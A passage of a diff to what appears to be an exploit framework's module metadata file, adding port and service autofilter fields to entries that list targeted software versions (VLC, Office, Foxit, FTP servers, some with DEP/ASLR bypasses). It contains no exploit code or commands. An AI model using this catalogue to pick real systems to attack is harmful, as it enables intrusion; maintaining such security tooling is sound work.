Studio 9.0" ], @@ -72466,6 +94518,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -72500,6 +94558,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Destiny Universal", "Windows XP SP2 Spanish" @@ -72534,6 +94598,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2" ], @@ -72568,6 +94638,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "DJ Studio Pro 5.1.6.5.2" ], @@ -72601,6 +94677,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -72632,6 +94714,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -72669,6 +94757,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "DVD X Player 5.5 Standard / Pro" ], @@ -72706,6 +94800,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 / Windows 7 SP1 (DEP Bypass)" ], @@ -72739,6 +94839,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -72774,6 +94880,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ERS Viewer 2011 (v11.04) / Windows XP SP3 / Windows 7 SP1" ], @@ -72808,6 +94920,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR", "ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass" @@ -72846,6 +94964,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Win XP SP3 / Windows Vista / Windows 7" ], @@ -72878,6 +95002,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -72916,6 +95046,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -72950,6 +95086,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -72988,6 +95130,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Free Download Manager 3.0 (Build 844)" ], @@ -73026,6 +95174,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -73059,6 +95213,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Foxit PDF Reader v4.2 (Windows XP SP0-SP3)", @@ -73096,6 +95256,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Foxit Reader 3.0 Windows XP SP2" ], @@ -73135,6 +95301,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 10 Pro x64 Build 17134" ], @@ -73171,6 +95343,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Foxit Reader v4.1.1 XP Universal" ], @@ -73208,6 +95386,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 EN" ], @@ -73241,6 +95425,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Universal" ], @@ -73276,6 +95466,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -73308,6 +95504,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "GTA SA-MP (samp-server) v0.3.1.1" ], @@ -73343,6 +95545,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP English SP3" ], @@ -73378,6 +95586,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP English SP3" ], @@ -73415,6 +95629,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP English SP3" ], @@ -73447,6 +95667,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]", "HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]", @@ -73485,6 +95711,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HT-MP3Player 1.0" ], @@ -73520,6 +95752,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1" ], @@ -73553,6 +95791,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM WorkStation 5.9 (Windows XP SP3)", "IBM WorkStation 5.9 (Windows 7, Windows Vista)" @@ -73590,6 +95834,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IcoFX 2.5 / Windows 7 SP1" ], @@ -73628,6 +95878,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IDEAL Migration <= 4.5.1 on Windows XP", "IDEAL Administration <= 10.5 on Windows XP" @@ -73662,6 +95918,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -73698,6 +95960,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Irfanview 4.32 / Plugins 4.32 / Windows Universal" ], @@ -73732,6 +96000,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ispVM System 18.0.2 / Windows XP SP3 / Windows 7 SP1" ], @@ -73768,6 +96042,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "KingView 6.52 English / KingView 6.53 Free Trial / Kingmess.exe 65.20.2003.10300 / Windows XP SP3" ], @@ -73805,6 +96085,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "PAC-Designer 6.21 on Windows XP SP3" ], @@ -73841,6 +96127,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal", "Lotus Notes 8.5.2 FP2 / Windows Universal / DEP" @@ -73875,6 +96167,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal DEP & ASLR Bypass" ], @@ -73907,6 +96205,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -73941,6 +96245,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Internet Explorer" ], @@ -73976,6 +96286,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MediaCoder 0.8.21 - 0.8.22 / Windows XP SP3 / Windows 7 SP0" ], @@ -74009,6 +96325,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 - English", "Windows XP SP2 - English" @@ -74043,6 +96365,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 / Vista / 7" ], @@ -74078,6 +96406,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -74114,6 +96448,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mini-stream RM-MP3 Converter v3.1.2.1.2010.03.30" ], @@ -74147,6 +96487,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal Generic DEP & ASLR Bypass" ], @@ -74180,6 +96526,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal Generic DEP & ASLR Bypass" ], @@ -74213,6 +96565,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -74247,6 +96605,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064" ], @@ -74281,6 +96645,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "SMPlayer 0.6.8 / mplayer.exe Sherpya-SVN-r29355-4.5.0 / Windows XP English SP3" ], @@ -74318,6 +96688,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office 2002 (XP) SP3 base English on Windows XP SP3 English", "Microsoft Office 2002 (XP) SP3 w/kb969680 English on Windows XP SP3 English", @@ -74358,6 +96734,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft PowerPoint Viewer 2003", "Microsoft PowerPoint Viewer 2003 (kb949041 or kb956500) or Office 2003 SP3", @@ -74398,6 +96780,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office Excel 2002 10.2614.2625 Service Pack 0(Office XP) on Windows XP SP3", "Microsoft Office Excel 2002 10.6501.6626 Service Pack 3 (Office XP SP3) on Windows XP SP3" @@ -74437,6 +96825,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Microsoft Office 2002 SP3 English on Windows XP SP3 English", @@ -74480,6 +96874,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 SP0/SP4 English", @@ -74520,6 +96920,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office Excel 2007 on Windows XP", "Microsoft Office Excel 2007 SP2 on Windows XP" @@ -74558,6 +96964,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office Word 2007/2010 on Windows 7" ], @@ -74595,6 +97007,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English", "Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English" @@ -74634,6 +97052,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 / Windows 2003 SP2" ], @@ -74670,6 +97094,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office 2010 SP2 English on Windows 7 SP1 English" ], @@ -74708,6 +97138,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 SP1 / Office 2010 SP2 / Office 2013" ], @@ -74744,6 +97180,12 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013" ], @@ -74780,6 +97222,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 SP1 / Office 2010 SP2 / Office 2013" ], @@ -74815,6 +97263,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -74847,6 +97301,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -74880,6 +97340,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2 English" ], @@ -74916,6 +97382,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 with Office Standard 2010" ], @@ -74948,6 +97420,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2-SP3 IE 7.0" ], @@ -74981,6 +97459,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal", "Windows Universal (SEH)", @@ -75015,6 +97499,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -75050,6 +97540,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -75083,6 +97579,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Nuance PDF Reader v6.x (XP SP3)" ], @@ -75115,6 +97617,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office" ], @@ -75149,6 +97657,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office" ], @@ -75201,6 +97715,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "All", "COM+ Services / Windows Vista - 10 / Office 2007 - 2016 (MS15-132)", @@ -75262,6 +97782,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office Word" ], @@ -75298,6 +97824,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "OpenOffice 2.3.1 / 2.3.0 on Windows XP SP3" ], @@ -75333,6 +97865,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Orbit Downloader 6.4 on Windows XP SP3", "Orbit Downloader 6.4 on Windows 7" @@ -75369,6 +97907,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Orbital Viewer 1.04 on Windows XP SP3" ], @@ -75404,6 +97948,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VMWare OVF Tools 2.1 on Windows XP SP3" ], @@ -75438,6 +97988,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -75474,6 +98030,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Photodex ProShow Producer 5.0.3256 / Windows XP SP3 / Windows 7 SP1" ], @@ -75508,6 +98070,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Publish-It 3.6d" ], @@ -75543,6 +98111,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3", "Windows 7/Windows Vista" @@ -75578,6 +98152,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 / Real Player 15.0.5.109" ], @@ -75614,6 +98194,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2/SP3 (DEP Bypass) / RealPlayer 16.0.3.51/16.0.2.32" ], @@ -75647,6 +98233,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 English", "WinSrv 2000 SP4 English", @@ -75683,6 +98275,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 / IE 7" ], @@ -75717,6 +98315,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -75752,6 +98356,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -75784,6 +98394,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "" ], @@ -75817,6 +98433,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -75851,6 +98473,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -75883,6 +98511,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -75919,6 +98553,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -75952,6 +98592,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -75989,6 +98635,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -76024,6 +98676,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal - Double-Click/Command Line Open Method", "Windows Universal - File->Open + Toolbar Open Methods" @@ -76060,6 +98718,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows - UltraISO v8.6.2.2011 portable", "Windows - UltraISO v8.6.0.1936" @@ -76095,6 +98759,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0" ], @@ -76131,6 +98801,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -76165,6 +98841,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VideoCharge Studio 2.12.3.685" ], @@ -76198,6 +98880,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VideoLAN VLC 0.9.4 (XP SP3 English)", "VideoLAN VLC 0.9.2 (XP SP3 English)" @@ -76234,6 +98922,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP/Vista/Win7/... Generic DEP & ASLR Bypass" ], @@ -76271,6 +98965,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Visio 2002 English on Windows XP SP3 Spanish", "Visio 2002 English on Windows XP SP3 English" @@ -76307,6 +99007,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3/Windows 7 SP0" ], @@ -76341,6 +99047,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VLC 1.1.8 on Windows XP SP3" ], @@ -76378,6 +99090,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VLC 0.9.4 on Windows XP SP3 / Windows 7 SP1" ], @@ -76413,6 +99131,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "vlc 0.9.9 on Windows XP SP3" ], @@ -76448,6 +99172,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VLC 1.1.6 on Windows XP SP3" ], @@ -76480,6 +99210,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VUPlayer 2.49" ], @@ -76512,6 +99248,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VUPlayer 2.49" ], @@ -76546,6 +99288,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 x32 - Watermark Master 2.2.23", "Windows 7 x64 - Watermark Master 2.2.23" @@ -76586,6 +99334,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Winamp 5.55 / Windows XP SP3 / Windows 7 SP1" ], @@ -76621,6 +99375,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -76656,6 +99416,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "WinXP SP3 Spanish (bypass DEP)", "WinXP SP2/SP3 English (bypass DEP)" @@ -76694,6 +99460,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Win32 Universal (Generic DEP & ASLR Bypass)" ], @@ -76727,6 +99499,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -76762,6 +99540,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2 / SP3" ], @@ -76800,6 +99584,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Xion Audio Player v1.0.126 XP Universal" ], @@ -76833,6 +99623,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -76868,6 +99664,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Zinf Universal 2.2.1" ], @@ -76901,6 +99703,12 @@ "platform": "Windows", "arch": "", "rport": 1, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Bruteforce", "Bruteforce iis-pam1.dll", @@ -76956,6 +99764,12 @@ "platform": "Windows", "arch": "", "rport": 44334, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro SP4 English", "Windows XP Pro SP0 English", @@ -76991,6 +99805,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XP Universal" ], @@ -77026,6 +99846,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic", "Windows 2000 English", @@ -77064,6 +99891,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XP SP3 Universal" ], @@ -77099,6 +99932,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic", "Windows XP SP2 ENG", @@ -77134,6 +99974,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252" ], @@ -77168,6 +100014,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Pro SP3 English" ], @@ -77204,6 +100056,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Bisonware FTP Server / Windows XP SP3 EN" ], @@ -77238,6 +100097,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 2000 Pro SP4 English", "Windows 2000 Pro SP4 French", @@ -77276,6 +100142,12 @@ "platform": "Windows", "arch": "x86", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP3 - English", @@ -77312,6 +100184,12 @@ "platform": "Windows", "arch": "x86", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Dream FTP Server v1.02 Universal" ], @@ -77345,6 +100223,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 2000 Pro English ALL", "Windows XP Pro SP0/SP1 English" @@ -77382,6 +100267,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows Universal - v1.7.0.2", "Windows Universal - v1.7.0.3", @@ -77426,6 +100318,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows XP SP3 - Version 2002" ], @@ -77460,6 +100359,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows Universal - v1.7.0.2", "Windows Universal - v1.7.0.3", @@ -77502,6 +100408,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 2k Server SP4 English", "Windows XP Pro SP2 Italian" @@ -77536,6 +100449,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -77569,6 +100488,13 @@ "platform": "Windows", "arch": 